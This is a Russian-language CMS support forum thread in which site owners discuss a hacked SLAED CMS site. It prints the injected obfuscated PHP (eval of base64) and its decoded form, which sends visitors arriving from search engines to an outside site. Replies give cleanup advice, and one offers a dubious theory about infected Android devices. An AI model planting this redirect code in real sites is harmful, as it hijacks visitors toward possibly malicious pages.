Открыть Ответить

вставили вредоносный код

13.12.2012 12:12:43 14.12.2012 17:15:42

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwogJHFhenBsbT1oZWFkZXJzX3Nl<br /> bnQoKTsKaWYgKCEkcWF6cGxtKXsKICRyZWZlcmVyPSRfU0VSVkV<br /> SWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU<br /> 0VSX0FHRU5UJ107CiBpZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmV<br /> mZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyK<br /> CRyZWZ<br /> lcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkc<br /> mVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKC<br /> RyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdH<br /> Jpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSB<br /> vciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb<br /> 3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzd<br /> HIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpd<br /> C5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcm<br /> VmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmN<br /> vbSIpI<br /> G9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZm<br /> FjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CiBpZiAoIXN0cmlz<br /> dHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewogaGVhZG<br /> VyKCJMb2NhdGlvbjogaHR0cDovL2JyZWFraW5nYmFkLm9zYS5wbC8iKTsKIGV4aXQoKTsKIH0KIH0KfQoJfQ=="));<br />


Что это?

SLAED CMS 4.* Pro
PHP 5
Сервер в интернете
mafioz
mafioz
2.95

2.95

Такая же фигня была-Все js файлы заражены.

1 ПЕрезалей js - файлы
2 Смени пароль от фтп

Но самое главное проверь комп на наличие вирусов.

ra55551
ra55551
3.75

3.75

error_reporting(0);
 $qazplm=headers_sent();
if (!$qazplm){
 $referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
 if ($uag) {
if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"***.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
 if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
 header("Location: http://breakingbad.osa.pl/");
 exit();
 }
 }
}
	}

Расшифровка...

SLAED CMS 5.* Pro
PHP 5
Сервер в интернете
AlexFly
AlexFly
3.71

3.71

Проверте Все файлы htaccess, угроза идет от смартфонов и планшетов под Андроид, которые имеют вирус и заходят на ваш сайт. Проблема серьезная, сам столкнулся, в сети мало инфо по этому поводу. Но мое мнение, что вирус лезет черех сервер хостера.

Open SLAED 1.*
PHP 5
Сервер в интернете
lev
lev
4.00

4.00

Рекомендую

  1. Обновить систему до актуальной версии.
  2. Удалить редактор spaw2.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
SLAED CMS
SLAED CMS
3.25

3.25

спасибо всем

mafioz
mafioz
2.95

2.95

Тоже в свое время задавался аналогичным вопросом! Ответ как всегда нашел здесь! Спасибо!!!

rofat
rofat
3.67

3.67

Открыть Ответить
Хотите опробовать SLAED CMS в действии?
Идеи и предложения
Обратная связь